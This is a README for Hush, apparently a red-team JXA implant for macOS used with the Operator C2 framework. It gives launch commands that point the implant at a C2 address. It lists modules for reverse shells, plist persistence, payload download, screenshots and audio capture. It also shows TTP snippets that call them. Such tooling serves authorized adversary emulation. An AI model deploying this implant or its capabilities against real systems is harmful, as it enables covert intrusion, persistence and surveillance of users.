Hush
Hush is a lightweight JXA agent for Mac OS systems after Yosemite (10.10). Hush is a fully modular file-less implant that will dynamically request and install new modules are they are needed.
Running
osascript -l JavaScript hush-darwin.js
You can run with a specified target address with:
osascript -l JavaScript hush-darwin.js http://192.168.1.1:3391 http
You can also launch with a proxy configuration:
osascript -l JavaScript hush-darwin.js http://192.168.1.1:3391 http http://alecks:[email protected]:8080
Modular system
All components of Hush are modular, from the C2 to the commands it executes. It uses Javascript's eval
to load in functions to a top-level modules
object. Each module is considered an "executor" by Operator.
Currently available modules:
- bash: run a shell command
- capture-audio: record system audio
- config: update Hush running config
- dylib-hijack-check: check for dylib hijack opportunities
- execute: run a binary with specific arguments
- http: HTTP POST C2 suport
- plist-persist-user: install a user-level plist persistence
- pwd: print working directory
- request-payload: download the specified target
- screenshot: take a screenshot of the desktop
- sh: run a shell command
- shell: spawn an interactive reverse shell back to Operator
A TTP that would call the pwd module would be formatted like this:
platforms:
darwin:
pwd:
command: ''
Shell commands are run using the standard sh
executor and no TTP changes are needed.
Modules that take arguments use JSON formatted data:
platforms:
darwin:
shell:
command: '{"Target": "#{operator.tcp_shell}"}'
Updated almost 2 years ago